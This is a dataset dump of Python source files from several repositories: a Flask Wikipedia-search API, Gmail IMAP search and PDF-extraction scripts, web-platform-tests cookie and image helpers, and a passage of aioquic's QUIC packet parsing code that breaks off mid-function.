metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jimmytsang/WikipediaTech",
"score": 3
} |
#### File: jimmytsang/WikipediaTech/application.py
```python
from flask import request, url_for
from flask_api import FlaskAPI, status, exceptions
from flask_cors import CORS
from zimmerbot import *
application = FlaskAPI(__name__)
CORS(application)
@application.route("/", methods=["GET", "POST"])
def get_links():
if request.method == "GET":
list_of_links = main("dog", "en", "popularity", "10", "include")
else:
print(request.data)
data = request.data
if data["filter"] == "ores_quality" and data["language"] not in ["en", "ru", "fr"]:
return ["ORES is not supported in this language"], status.HTTP_202_ACCEPTED
list_of_links = main(data["query"], data["language"], data["filter"], data["limit"], data["stub"])
if not list_of_links:
return ["No search results found for this query"], status.HTTP_202_ACCEPTED
return list_of_links
# run the app.
if __name__ == "__main__":
# Setting debug to True enables debug output. This line should be
# removed before deploying a production app.
# app.debug = True
application.run()
```
#### File: jimmytsang/WikipediaTech/linked_pages.py
```python
import pywikibot
import json, urllib
from language_dict import language_dict
# def generate_language_dict():
# with open("list_of_wiki_languages.txt", "r") as file:
# lines = file.read().split(",")
# for i in range(len(lines)):
# lines[i] = lines[i].strip()
# lines[i] = lines[i].strip("\'")
# dictionary = {lines[i+1]:lines[i] for i in range(0, len(lines), 2)}
# return dictionary
### primary function
def count_backlinks(article_name, language_code):
site = pywikibot.getSite(language_code)
backlinks = getlinks(site, article_name)
print(article_name)
linked_to_count = 0
for backlink in backlinks:
linked_to_count += 1
print(str(linked_to_count) + " articles link to " + article_name + "\n")
return linked_to_count
### returns num number of links that link to the original article (in this case the original article is set to the first
### article that appears in the generated set of articles)
def getlinks(site, pageName):
page = pywikibot.Page(site, pageName)
return site.pagebacklinks(page, followRedirects=False, filterRedirects=True)
if __name__ == "__main__":
count_backlinks("Pear", language_dict["English"])
```
#### File: jimmytsang/WikipediaTech/zimmerbot.py
```python
from query_article_titles import *
from page_popularity import *
from linked_pages import *
from ores_assessment import *
import sys
# MAIN FUNCTION
def main(query, language_code, filter_method, limit, stub):
# Process script arguments
# For now, we only support limiting by number of articles, not total package size
limit = min(int(limit), 500)
# Get the query results (list of dictionaries)
article_dictionaries = query_articles(query, language_code)[:limit+20]
# List of article titles
article_names = get_article_names_from_query(article_dictionaries)
if filter_method == "ores_quality" or stub == "exclude":
ores_rating_results = get_ores_assessment(article_names, language_code)
# Assign a numerical score based on qualitative assessment
scaled_ores_rating_results = scale_article_assessments(ores_rating_results)
if stub == "exclude":
scaled_ores_rating_results = {name : score for name, score in scaled_ores_rating_results.items() if score != 0}
article_names = [name for name in article_names if name in scaled_ores_rating_results]
# Dictionary of page objects with article names as keys
articles = get_articles_from_names(article_names, language_code) # {"title: page_object"}
# Initialize empty dictionary of article ratings hashed by article name/title
article_ratings = {} # {"title: numerical_article_score"}
if filter_method == "ores_quality":
article_ratings = scaled_ores_rating_results
elif filter_method == "popularity":
for article in articles:
article_ratings[article] = get_page_view(article, language_code)
elif filter_method == "most_linked_to":
for article in articles:
article_ratings[article] = count_backlinks(article, language_code)
else:
print("Invalid filter method. Please choose popularity, most_linked_to, or ores_quality")
sys.exit(0)
sorted_articles = sorted(articles.items(), key=lambda x: article_ratings[x[0]], reverse=True)
return process_results(sorted_articles[:limit])
def process_results(sorted_articles):
results = []
for i in range(len(sorted_articles)):
results.append(sorted_articles[i][1].full_url())
return results
if __name__ == "__main__":
query = input("Please enter your query: ")
language = language_dict[input("Please enter a language: ").capitalize()]
filter_method = input("Please enter the filtering method: ")
limit = input("Enter a limit no more than 500: ")
stub = "include"
main(query, language, filter_method, limit, stub)
``` |
{
"source": "JimmyVanHout/gmail_tools",
"score": 3
} |
#### File: JimmyVanHout/gmail_tools/gmail_extract_pdfs.py
```python
import datetime
import email
import gmail_search
import os
import re
import sys
IMAP_SERVER = "imap.gmail.com"
IMAP_PORT = "993"
VALID_OPTIONS = ["--use-config-file"]
CONFIG_FILE_NAME = "config.txt"
def get_dates_and_pdfs(messages):
dates_and_pdfs = []
for message in messages:
pdf = None
message_obj = email.message_from_string(message)
for part in message_obj.get_payload():
if part.get_content_type() == "application/octet-stream":
pdf = part.get_payload(decode=True)
break
date_pattern = re.compile(r"Date\: (?P<day_of_week>\w+), (?P<day>\d+) (?P<month>\w+) (?P<year>\d+) (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)")
date_match_groups = re.search(date_pattern, message).groupdict()
date = datetime.datetime.strptime(" ".join(list(date_match_groups.values())), "%a %d %b %Y %H %M %S")
dates_and_pdfs.append((date, pdf))
return dates_and_pdfs
def write_pdfs(dates_and_pdfs, beginning_of_name):
for date, pdf in dates_and_pdfs:
name = beginning_of_name + "-" + date.isoformat().replace(":", "-") + ".pdf"
with open(name, "wb") as file:
file.write(pdf)
def get_config_data_from_input():
email_address = input("Email address: ")
password = input("Password: ")
mailbox = input("Mailbox (default is \"inbox\"): ")
if mailbox == "":
mailbox = "inbox"
return email_address, password, mailbox
def write_data_to_config_file(email_address, password, mailbox):
with open(CONFIG_FILE_NAME, "w") as file:
file.write(email_address + " # email address\n")
file.write(password + " # <PASSWORD>")
file.write(mailbox + " # mailbox\n")
def read_data_from_config_file():
with open(CONFIG_FILE_NAME, "r") as file:
email_address = file.readline().split("#", 1)[0].rstrip()
password = file.readline().split("#", 1)[0].rstrip()
mailbox = file.readline().split("#", 1)[0].rstrip()
return email_address, password, mailbox
def print_correct_usage():
print("Correct use:\n")
print("python3 gmail_extract_pdfs.py <query_str> <beginning_of_name> [--use_config_file]")
def is_command_valid(command):
if len(command) < 3:
return False
if len(command) > 3:
for word in command[3:]:
if word not in VALID_OPTIONS:
return False
return True
def get_command_start_index(args):
for i in range(len(args)):
if os.path.basename(os.path.realpath(__file__)) in sys.argv[i]:
return i
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.realpath(__file__)))
command = sys.argv[get_command_start_index(sys.argv):]
if not is_command_valid(command):
print_correct_usage()
sys.exit(1)
search_str = command[1]
beginning_of_name = command[2]
use_config_file = True if "--use-config-file" in command else False
if use_config_file:
if CONFIG_FILE_NAME in os.listdir():
email_address, password, mailbox = read_data_from_config_file()
else:
email_address, password, mailbox = get_config_data_from_input()
write_data_to_config_file(email_address, password, mailbox)
else:
email_address, password, mailbox = get_config_data_from_input()
messages = gmail_search.search(email_address, password, search_str, mailbox)
dates_and_pdfs = get_dates_and_pdfs(messages)
if not os.path.isdir("pdfs"):
os.mkdir("pdfs")
os.chdir("pdfs")
write_pdfs(dates_and_pdfs, beginning_of_name)
os.chdir("..")
sys.exit(0)
```
#### File: JimmyVanHout/gmail_tools/gmail_search.py
```python
import imaplib
import os
import ssl
import sys
VALID_OPTIONS = ["--use-config-file", "--save-messages"]
CONFIG_FILE_NAME = "config.txt"
IMAP_SERVER = "imap.gmail.com"
PORT = "993"
def search(email_address, password, search_str, mailbox="inbox"):
imap4ssl = setup(email_address, password, mailbox)
message_ids = get_message_ids(imap4ssl, search_str)
messages = get_messages(imap4ssl, message_ids)
messages = clean(messages)
finish(imap4ssl)
return messages
def setup(email_address, password, mailbox):
ssl_context = ssl.create_default_context()
imap4ssl = imaplib.IMAP4_SSL(host=IMAP_SERVER, port=PORT, ssl_context=ssl_context)
imap4ssl.login(email_address, password)
imap4ssl.select(mailbox)
return imap4ssl
def get_message_ids(imap4ssl, search_str):
message_ids = imap4ssl.search(None, search_str)[1][0].split()
print("Found " + str(len(message_ids)) + " messages")
return message_ids
def get_messages(imap4ssl, message_ids):
messages = []
print("Fetching messages")
count = 1
for message_id in message_ids:
message = imap4ssl.fetch(message_id, "(RFC822)")[1][0][1].decode("utf-8")
messages.append(message)
print("Progress: {percentage:.2f}%".format(percentage=(count / len(message_ids) * 100)))
count += 1
print("Finished fetching messages")
return messages
def clean(messages):
cleaned_messages = []
for message in messages:
cleaned_message = message.replace("=\r\n", "")
cleaned_messages.append(cleaned_message)
return cleaned_messages
def finish(imap4ssl):
imap4ssl.close()
imap4ssl.logout()
def print_correct_usage():
print("Correct use:\n")
print("python3 gmail_search.py <query_str> [--use_config_file] [--save_messages]")
def get_config_data_from_input():
email_address = input("Email address: ")
password = input("Password: ")
mailbox = input("Mailbox (default is \"inbox\"): ")
if mailbox == "":
mailbox = "inbox"
return email_address, password, mailbox
def write_data_to_config_file(email_address, password, mailbox):
with open(CONFIG_FILE_NAME, "w") as file:
file.write(email_address + " # email address\n")
file.write(password + " # <PASSWORD>")
file.write(mailbox + " # mailbox\n")
def read_data_from_config_file():
with open(CONFIG_FILE_NAME, "r") as file:
email_address = file.readline().split("#", 1)[0].rstrip()
password = file.readline().split("#", 1)[0].rstrip()
mailbox = file.readline().split("#", 1)[0].rstrip()
return email_address, password, mailbox
def write_messages_to_files(messages):
for i in range(len(messages)):
with open("message_" + str(i + 1) + ".txt", "w") as file:
file.write(messages[i])
def print_messages(messages):
for message in messages:
print(message)
def is_command_valid(command):
if len(command) == 1:
return False
if len(command) > 2:
for word in command[2:]:
if word not in VALID_OPTIONS:
return False
return True
def get_command_start_index(args):
for i in range(len(args)):
if os.path.basename(os.path.realpath(__file__)) in sys.argv[i]:
return i
if __name__ == "__main__":
os.chdir(os.path.dirname(os.path.realpath(__file__)))
command = sys.argv[get_command_start_index(sys.argv):]
if not is_command_valid(command):
print_correct_usage()
sys.exit(1)
search_str = command[1]
use_config_file = True if "--use-config-file" in command else False
save_messages = True if "--save-messages" in command else False
email_address = password = mailbox = None
if use_config_file:
if CONFIG_FILE_NAME in os.listdir():
email_address, password, mailbox = read_data_from_config_file()
else:
email_address, password, mailbox = get_config_data_from_input()
write_data_to_config_file(email_address, password, mailbox)
else:
email_address, password, mailbox = get_config_data_from_input()
messages = search(email_address, password, search_str, mailbox)
if save_messages:
if not os.path.isdir("messages"):
os.mkdir("messages")
os.chdir("messages")
write_messages_to_files(messages)
os.chdir("..")
else:
print_messages(messages)
sys.exit(0)
``` |
{
"source": "jimmyvluong/apacheairflow",
"score": 3
} |
#### File: jimmyvluong/apacheairflow/airflow_examples.py
```python
etl_dag = DAG(
dag_id = 'etl_pipeline',
default_args = {"start_date": "2020-01-08"}
# Note that within any Python code, etl_dag is the variable identifier, but within the Airflow shell command, you must use the dag_id.
# Running a simple Airflow task
# airflow run <dag_id> <task_id> <start_date>
airflow run example-etl download-file 2020-01-10
# DAGs on the command line
# list all DAGs
airflow list_dags
# help
airflow -h
### EXAMPLE 1 ###
# Import the DAG object
from airflow.models import DAG
# Define the default_args dictionary
default_args = {
'owner': 'dsmith',
'start_date': datetime(2020, 1, 14),
'retries': 2
}
# Instantiate the DAG object
etl_dag = DAG('example_etl', default_args=default_args)
### EXAMPLE 2 ###
from airflow.models import DAG
default_args = {
'owner': 'jdoe',
'start_date': '2019-01-01'
}
dag = DAG( dag_id="etl_update", default_args=default_args )
### EXAMPLE 3 ###
from airflow.models import DAG
default_args = {
'owner': 'jdoe',
'email': '<EMAIL>'
}
dag = DAG( 'refresh_data', default_args=default_args )
### WEB INTERFACE ###
airflow webserver -h
# Start an airflow webserver on port 9090
airflow webserver -p 9090
### OPERATORS ###
## TROUBLESHOOTING ##
# The dummy operator is used for troubleshooting or for a task that has NOT yet been implemented
DummyOperator(task_id = 'example', dag = dag)
## BASH OPERATOR ##
# Import the BashOperator
from airflow.operators.bash_operator import BashOperator
# Executes a given bash command or script
## EXAMPLE 1 ##
# Runs a bash command to echo "Example!" to standard output
BashOperator(
task_id = 'bash_example',
bash_command = 'echo "Example!"',
dag = ml_dag)
## Example 2 ##
# Runs a predefined bash script for its command, runcleanup
BashOperator(
task_id = 'bash_script_example',
bash_command = 'run_cleanup.sh',
dag = ml_dag)
## Example 3 ##
# Run a task_id, run the bash_command 'echo 1', and assisn the operator to a DAG.
# Note that we defined the DAG in line 37.
example_task = BashOperator(
task_id = 'bash_ex',
bash_command = 'echo 1',
dag = dag)
## Example 4 ##
# Run a quick data cleaning operation using cat and awk.
bash_task = BashOperator(
task_id = 'clean_addresses',
bash_command = 'cat addresses.txt | awk "NF == 10" > cleaned.txt',
dag = dag)
## Example 5 ##
# A collection of 3 BashOperators in an Airflow workflow, with dependencies by the BitShift operator.
# This adds reliability and repeatablity to common tasks run from the shell.
# Import the BashOperator
from airflow.operators.bash_operator import BashOperator
# Define the first BashOperator
task1_cleanup = BashOperator(
task_id='first_cleanup_task',
# Define the bash_command
bash_command='cleanup.sh',
# Add the task to the dag
dag= analytics_dag)
# Define a second operator to run the `consolidate_data.sh` script
task2_consolidate = BashOperator(
task_id='second_consolidate_task',
bash_command= 'consolidate_data.sh',
dag = analytics_dag)
# Define a final operator to execute the `push_data.sh` script
task3_push_data = BashOperator(
task_id='third_pushdata_task',
bash_command='push_data.sh',
dag = analytics_dag)
## DEPENDENCIES ##
# task 1 must run before task 2
# task 3 must run before task 2
# task 1 or task 3 don
task1_cleanup >> task2_consolidate
task3_push_data >> task2_consolidate
# Example of chained tasks
# task_1 >> task_2 >> task_3
## CO-DEPENDENCY ERROR ##
# List the DAGs.
# Decipher the error message.
# Use cat workspace/dags/codependent.py to view the Python code.
ERROR - Failed to bag_dag: /home/repl/workspace/dags/codependent.py
cat workspace/dags/codependent.py
----------------------------------
repl:~$ cat workspace/dags/codependent.py
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime
default_args = {
'owner': 'dsmith',
'start_date': datetime(2020, 2, 12),
'retries': 1
}
codependency_dag = DAG('codependency', default_args=default_args)
task1 = BashOperator(task_id='first_task',
bash_command='echo 1',
dag=codependency_dag)
task2 = BashOperator(task_id='second_task',
bash_command='echo 2',
dag=codependency_dag)
task3 = BashOperator(task_id='third_task',
bash_command='echo 3',
dag=codependency_dag)
# task1 must run before task2 which must run before task3
task1 >> task2
task2 >> task3
task3 >> task1 # THIS LINE NEEDS TO BE DELETED.
# Using the Airflow UI to determine any issues with your DAGs is a great troubleshooting step.
# For this particular issue, a loop, or cycle, is present within the DAG.
# Note that technically removing the first dependency would resolve the issue as well, but the comments specifically reference the desired effect.
# Commenting the desired effect in this way can often help resolve bugs in Airflow DAG execution.
### PythonOperator ###
## Example 1 ##
# A simple printme function that writes a message to the task logs.
# Import the PythonOperator
from airflow.operators.python_operator import PythonOperator
# Create the function printme()
def printme():
print("This goes in the logs!")
# Create the PythonOperator instance called python_task and add the necessary arguments
python_task = PythonOperator(
task_id = 'simple_print',
python_callable = printme,
dag = example_dag)
``` |
{
"source": "jimmywarting/wpt",
"score": 3
} |
#### File: cookies/resources/cookie.py
```python
import json
from cookies.resources.helpers import setNoCacheAndCORSHeaders
from wptserve.utils import isomorphic_decode
from wptserve.utils import isomorphic_encode
def set_cookie(headers, cookie_string, drop=False):
"""Helper method to add a Set-Cookie header"""
if drop:
cookie_string = cookie_string.encode('utf-8') + b'; max-age=0'
headers.append((b'Set-Cookie', isomorphic_encode(cookie_string)))
def main(request, response):
"""Set or drop a cookie via GET params.
Usage: `/cookie.py?set={cookie}` or `/cookie.py?drop={cookie}`
The passed-in cookie string should be stringified via JSON.stringify() (in
the case of multiple cookie headers sent in an array) and encoded via
encodeURIComponent, otherwise `parse_qsl` will split on any semicolons
(used by the Request.GET property getter). Note that values returned by
Request.GET will decode any percent-encoded sequences sent in a GET param
(which may or may not be surprising depending on what you're doing).
Note: here we don't use Response.delete_cookie() or similar other methods
in this resources directory because there are edge cases that are impossible
to express via those APIs, namely a bare (`Path`) or empty Path (`Path=`)
attribute. Instead, we pipe through the entire cookie and append `max-age=0`
to it.
"""
headers = setNoCacheAndCORSHeaders(request, response)
try:
if b'drop' in request.GET:
cookie = request.GET[b'drop']
cookie = json.loads(cookie)
cookies = cookie if isinstance(cookie, list) else [cookie]
for c in cookies:
set_cookie(headers, c, drop=True)
if b'set' in request.GET:
cookie = isomorphic_decode(request.GET[b'set'])
cookie = json.loads(cookie)
cookies = cookie if isinstance(cookie, list) else [cookie]
for c in cookies:
set_cookie(headers, c)
if b'location' in request.GET:
headers.append((b'Location', request.GET[b'location']))
return 302, headers, b'{"redirect": true}'
return headers, b'{"success": true}'
except Exception as e:
return 500, headers, bytes({'error': '{}'.format(e)})
```
#### File: embedded-content/the-img-element/404-response-with-actual-image-data.py
```python
import base64
def main(req, res):
return 404, [(b'Content-Type', b'image/png')], base64.decodebytes(b"<KEY>=")
```
#### File: aioquic/quic/packet.py
```python
import binascii
import ipaddress
import os
from dataclasses import dataclass
from enum import IntEnum
from typing import List, Optional, Tuple
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from ..buffer import Buffer
from ..tls import pull_block, push_block
from .rangeset import RangeSet
PACKET_LONG_HEADER = 0x80
PACKET_FIXED_BIT = 0x40
PACKET_SPIN_BIT = 0x20
PACKET_TYPE_INITIAL = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x00
PACKET_TYPE_ZERO_RTT = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x10
PACKET_TYPE_HANDSHAKE = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x20
PACKET_TYPE_RETRY = PACKET_LONG_HEADER | PACKET_FIXED_BIT | 0x30
PACKET_TYPE_ONE_RTT = PACKET_FIXED_BIT
PACKET_TYPE_MASK = 0xF0
CONNECTION_ID_MAX_SIZE = 20
PACKET_NUMBER_MAX_SIZE = 4
RETRY_AEAD_KEY = binascii.unhexlify("4d32ecdb2a2133c841e4043df27d4430")
RETRY_AEAD_NONCE = binascii.unhexlify("4d1611d05513a552c587d575")
RETRY_INTEGRITY_TAG_SIZE = 16
class QuicErrorCode(IntEnum):
NO_ERROR = 0x0
INTERNAL_ERROR = 0x1
SERVER_BUSY = 0x2
FLOW_CONTROL_ERROR = 0x3
STREAM_LIMIT_ERROR = 0x4
STREAM_STATE_ERROR = 0x5
FINAL_SIZE_ERROR = 0x6
FRAME_ENCODING_ERROR = 0x7
TRANSPORT_PARAMETER_ERROR = 0x8
CONNECTION_ID_LIMIT_ERROR = 0x9
PROTOCOL_VIOLATION = 0xA
INVALID_TOKEN = 0xB
CRYPTO_BUFFER_EXCEEDED = 0xD
CRYPTO_ERROR = 0x100
class QuicProtocolVersion(IntEnum):
NEGOTIATION = 0
DRAFT_25 = 0xFF000019
DRAFT_26 = 0xFF00001A
DRAFT_27 = 0xFF00001B
@dataclass
class QuicHeader:
is_long_header: bool
version: Optional[int]
packet_type: int
destination_cid: bytes
source_cid: bytes
token: bytes = b""
integrity_tag: bytes = b""
rest_length: int = 0
def decode_packet_number(truncated: int, num_bits: int, expected: int) -> int:
"""
Recover a packet number from a truncated packet number.
See: Appendix A - Sample Packet Number Decoding Algorithm
"""
window = 1 << num_bits
half_window = window // 2
candidate = (expected & ~(window - 1)) | truncated
if candidate <= expected - half_window and candidate < (1 << 62) - window:
return candidate + window
elif candidate > expected + half_window and candidate >= window:
return candidate - window
else:
return candidate
def get_retry_integrity_tag(
packet_without_tag: bytes, original_destination_cid: bytes
) -> bytes:
"""
Calculate the integrity tag for a RETRY packet.
"""
# build Retry pseudo packet
buf = Buffer(capacity=1 + len(original_destination_cid) + len(packet_without_tag))
buf.push_uint8(len(original_destination_cid))
buf.push_bytes(original_destination_cid)
buf.push_bytes(packet_without_tag)
assert buf.eof()
# run AES-128-GCM
aead = AESGCM(RETRY_AEAD_KEY)
integrity_tag = aead.encrypt(RETRY_AEAD_NONCE, b"", buf.data)
assert len(integrity_tag) == RETRY_INTEGRITY_TAG_SIZE
return integrity_tag
def get_spin_bit(first_byte: int) -> bool:
return bool(first_byte & PACKET_SPIN_BIT)
def is_long_header(first_byte: int) -> bool:
return bool(first_byte & PACKET_LONG_HEADER)
def pull_quic_header(buf: Buffer, host_cid_length: Optional[int] = None) -> QuicHeader:
first_byte = buf.pull_uint8()
integrity_tag = b""
token = b""
if is_long_header(first_byte):
# long header packet
version = buf.pull_uint32()
destination_cid_length = buf.pull_uint8()
if destination_cid_length > CONNECTION_ID_MAX_SIZE:
raise ValueError(
"Destination CID is too long (%d bytes)" % destination_cid_length
)
destination_cid = buf.pull_bytes(destination_cid_length)
source_cid_length = buf.pull_uint8()
if source_cid_length > CONNECTION_ID_MAX_SIZE:
raise ValueError("Source CID is too long (%d bytes)" % source_cid_length)
source_cid = buf.pull_bytes(source_cid_length)
if version == QuicProtocolVersion.NEGOTIATION:
# version negotiation
packet_type = None
rest_length = buf.capacity - buf.tell()
else:
if not (first_byte & PACKET_FIXED_BIT):
raise ValueError("Packet fixed bit is zero")
packet_type = first_byte & PACKET_TYPE_MASK
if packet_type == PACKET_TYPE_INITIAL:
token_length = buf.pull_uint_var()
token = buf.pull_bytes(token_length)
rest_length = buf.pull_uint_var()
elif packet_type == PACKET_TYPE_RETRY:
token_length = buf.capacity - buf.tell() - RETRY_INTEGRITY_TAG_SIZE
token = buf.pull_bytes(token_length)
integrity_tag = buf.pull_bytes(RETRY_INTEGRITY_TAG_SIZE)
rest_length = 0
else:
rest_length = buf.pull_uint_var()
return QuicHeader(
is_long_header=True,
version=version,
packet_type=packet_type,
destination_cid=destination_cid,
source_cid=source_cid,
token=token,
integrity_tag=integrity_tag,
rest_length=rest_length,
)
else:
# short header packet
if not (first_byte & PACKET_FIXED_BIT):
raise ValueError("Packet fixed bit is zero")
packet_type = first_byte & PACKET_TYPE_MASK
destination_cid = buf.pull_bytes(host_cid_length)
return QuicHeader(
is_long_header=False,
version=None,
packet_type=packet_type,
destination_cid=destination_cid,
source_cid=b"",
token=b"",
rest_length=buf.capacity - buf.tell(),
)
def encode_quic_retry(
version: int,
source_cid: bytes,
destination_cid: bytes,
original_destination_cid: bytes,
retry_token: bytes,
) -> bytes:
buf = Buffer(
capacity=7
+ len(destination_cid)
+ len(source_cid)
+ len(retry_token)
+ RETRY_INTEGRITY_TAG_SIZE
)
buf.push_uint8(PACKET_TYPE_RETRY)
buf.push_uint32(version)
buf.push_uint8(len(destination_cid))
buf.push_bytes(destination_cid)
buf.push_uint8(len(source_cid))
buf.push_bytes(source_cid)
buf.push_bytes(retry_token)
buf.push_bytes(get_retry_integrity_tag(buf.data, original_destination_cid))
assert buf.eof()
return buf.data
def encode_quic_version_negotiation(
source_cid: bytes, destination_cid: bytes, supported_versions: List[int]
) -> bytes:
buf = Buffer(
capacity=7
+ len(destination_cid)
+ len(source_cid)
+ 4 * len(supported_versions)
)
buf.push_uint8(os.urandom(1)[0] | PACKET_LONG_HEADER)
buf.push_uint32(QuicProtocolVersion.NEGOTIATION)
buf.push_uint8(len(destination_cid))
buf.push_bytes(destination_cid)
buf.push_uint8(len(source_cid))
buf.push_bytes(source_cid)
for version in supported_versions:
buf.push_uint32(version)
return buf.data
# TLS EXTENSION
@dataclass
class QuicPreferredAddress:
ipv4_address: Optional[Tuple[str, int]]
ipv6_address: Optional[Tuple[str, int]]
connection_id: bytes
stateless_reset_token: bytes
@dataclass
class QuicTransportParameters:
original_connection_id: Optional[bytes] = None
idle_timeout: Optional[int] = None
stateless_reset_token: Optional[bytes] = None
max_packet_size: Optional[int] = None
initial_max_data: Optional[int] = None
initial_max_stream_data_bidi_local: Optional[int] = None
initial_max_stream_data_bidi_remote: Optional[int] = None
initial_max_stream_data_uni: Optional[int] = None
initial_max_streams_bidi: Optional[int] = None
initial_max_streams_uni: Optional[int] = None
ack_delay_exponent: Optional[int] = None
max_ack_delay: Optional[int] = None
disable_active_migration: Optional[bool] = False
preferred_address: Optional[QuicPreferredAddress] = None
active_connection_id_limit: Optional[int] = None
max_datagram_frame_size: Optional[int] = None
quantum_readiness: Optional[bytes] = None
PARAMS = {
0: ("original_connection_id", bytes),
1: ("idle_timeout", int),
2: ("stateless_reset_token", bytes),
3: ("max_packet_size", int),
4: ("initial_max_data", int),
5: ("initial_max_stream_data_bidi_local", int),
6: ("initial_max_stream_data_bidi_remote", int),
7: ("initial_max_stream_data_uni", int),
8: ("initial_max_streams_bidi", int),
9: ("initial_max_streams_uni", int),
10: ("ack_delay_exponent", int),
11: ("max_ack_delay", int),
12: ("disable_active_migration", bool),
13: ("preferred_address", QuicPreferredAddress),
14: ("active_connection_id_limit", int),
32: ("max_datagram_frame_size", int),
3127: ("quantum_readiness", bytes),
}
def pull_quic_preferred_address(buf: Buffer) -> QuicPreferredAddress:
ipv4_address = None
ipv4_host = buf.pull_bytes(4)
ipv4_port = buf.pull_uint16()
if ipv4_host != bytes(4):
ipv4_address = (str(ipaddress.IPv4Address(ipv4_host)), ipv4_port)
ipv6_address = None
ipv6_host = buf.pull_bytes(16)
ipv6_port = buf.pull_uint16()
if ipv6_host != bytes(16):
ipv6_address = (str(ipaddress.IPv6Address(ipv6_host)), ipv6_port)
connection_id_length = buf.pull_uint8()
connection_id = buf.pull_bytes(connection_id_length)
stateless_reset_token = buf.pull_bytes(16)
return QuicPreferredAddress(
ipv4_address=ipv4_address,
ipv6_address=ipv6_address,
connection_id=connection_id,
stateless_reset_token=stateless_reset_token,
)
def push_quic_preferred_address(
buf: Buffer, preferred_address: QuicPreferredAddress
) -> None:
if preferred_address.ipv4_address is not None:
buf.push_bytes(ipaddress.IPv4Address(preferred_address.ipv4_address[0]).packed)
buf.push_uint16(preferred_address.ipv4_address[1])
else:
buf.push_bytes(bytes(6))
if preferred_address.ipv6_address is not None:
buf.push_bytes(ipaddress.IPv6Address(preferred_address.ipv6_address[0]).packed)
buf.push_uint16(preferred_address.ipv6_address[1])
else:
buf.push_bytes(bytes(18))
buf.push_uint8(len(preferred_address.connection_id))
buf.push_bytes(preferred_address.connection_id)
buf.push_bytes(preferred_address.stateless_reset_token)
def pull_quic_transport_parameters(
buf: Buffer, protocol_version: int
) -> QuicTransportParameters:
params = QuicTransportParameters()
if protocol_version < QuicProtocolVersion.DRAFT_27:
with pull_block(buf, 2) as length:
end = buf.tell() + length
while buf.tell() < end:
param_id = buf.pull_uint16()
param_len = buf.pull_uint16()
param_start = buf.tell()
if param_id in PARAMS:
# parse known parameter
param_name, param_type = PARAMS[param_id]
if param_type == int:
setattr(params, param_name, buf.pull_uint_var())
elif param_type == bytes:
setattr(params, param_name, buf.pull_bytes(param_len))
elif param_type == QuicPreferredAddress:
setattr(params, param_name, pull_quic_preferred_address(buf))
else:
setattr(params, param_name, True)
else:
# skip unknown parameter
buf.pull_bytes(param_len)
assert buf.tell() == param_start + param_len
else:
while not buf.eof():
param_id = buf.pull_uint_var()
param_len = buf.pull_uint_var()
param_start = buf.tell()
if param_id in PARAMS:
# parse known parameter
param_name, param_type = PARAMS[param_id]
if param_type == int:
setattr(params, param_name, buf.pull_uint_var())
elif param_type == bytes:
setattr(params, param_name, buf.pull_bytes(param_len))
elif param_type == QuicPreferredAddress:
setattr(params, param_name, pull_quic_preferred_address(buf))
else:
setattr(params, param_name, True)
else:
# skip unknown parameter
buf.pull_bytes(param_len)
assert buf.tell() == param_start + param_len
return params
def push_quic_transport_parameters(
buf: Buffer, params: QuicTransportParameters, protocol_version: int
) -> None:
if protocol_version < QuicProtocolVersion.DRAFT_27:
with push_block(buf, 2):
for param_id, (param_name, param_type) in PARAMS.items():
param_value = getattr(params, param_name)
if param_value is not None and param_value is not False:
buf.push_uint16(param_id)
with push_block(buf, 2):
if param_type == int:
buf.push_uint_var(param_value)
elif param_type == bytes:
buf.push_bytes(param_value)
elif param_type == QuicPreferredAddress:
push_quic_preferred_address(buf, param_value)
else:
for param_id, (param_name, param_type) in PARAMS.items():
param_value = getattr(params, param_name)
if param_value is not None and param_value is not False:
param_buf = Buffer(capacity=65536)
if param_type == int:
param_buf.push_uint_var(param_value)
elif param_type == bytes:
param_buf.push_bytes(param_value)
elif param_type == QuicPreferredAddress:
push_quic_preferred_address(param_buf, param_value)
buf.push_uint_var(param_id)
buf.push_uint_var(param_buf.tell())
buf.push_bytes(param_buf.data)
# FRAMES
class QuicFrameType(IntEnum):
PADDING = 0x00
PING = 0x01
ACK = 0x02
ACK_ECN = 0x03
RESET_STREAM = 0x04
STOP_SENDING = 0x05
CRYPTO = 0x06
NEW_TOKEN = 0x07
STREAM_BASE = 0x08
MAX_DATA = 0x10
MAX_STREAM_DATA = 0x11
MAX_STREAMS_BIDI = 0x12
MAX_STREAMS_UNI = 0x13
DATA_BLOCKED = 0x14
STREAM_DATA_BLOCKED = 0x15
STREAMS_BLOCKED_BIDI = 0x16
STREAMS_BLOCKED_UNI = 0x17
NEW_CONNECTION_ID = 0x18
RETIRE_CONNECTION_ID = 0x19
PATH_CHALLENGE = 0x1A
PATH_RESPONSE = 0x1B
TRANSPORT_CLOSE = 0x1C
APPLICATION_CLOSE = 0x1D
HANDSHAKE_DONE = 0x1E
DATAGRAM = 0x30
DATAGRAM_WITH_LENGTH = 0x31
NON_ACK_ELICITING_FRAME_TYPES = frozenset(
[
QuicFrameType.ACK,
QuicFrameType.ACK_ECN,
QuicFrameType.PADDING,
QuicFrameType.TRANSPORT_CLOSE,
QuicFrameType.APPLICATION_CLOSE,
]
)
NON_IN_FLIGHT_FRAME_TYPES = frozenset(
[
QuicFrameType.ACK,
QuicFrameType.ACK_ECN,
QuicFrameType.TRANSPORT_CLOSE,
QuicFrameType.APPLICATION_CLOSE,
]
)
PROBING_FRAME_TYPES = frozenset(
[
QuicFrameType.PATH_CHALLENGE,
QuicFrameType.PATH_RESPONSE,
QuicFrameType.PADDING,
QuicFrameType.NEW_CONNECTION_ID,
]
)
@dataclass
class QuicStreamFrame:
data: bytes = b""
fin: bool = False
offset: int = 0
def pull_ack_frame(buf: Buffer) -> Tuple[RangeSet, int]:
rangeset = RangeSet()
end = buf.pull_uint_var() # largest acknowledged
delay = buf.pull_uint_var()
ack_range_count = buf.pull_uint_var()
ack_count = buf.pull_uint_var() # first ack range
rangeset.add(end - ack_count, end + 1)
end -= ack_count
for _ in range(ack_range_count):
end -= buf.pull_uint_var() + 2
ack_count = buf.pull_uint_var()
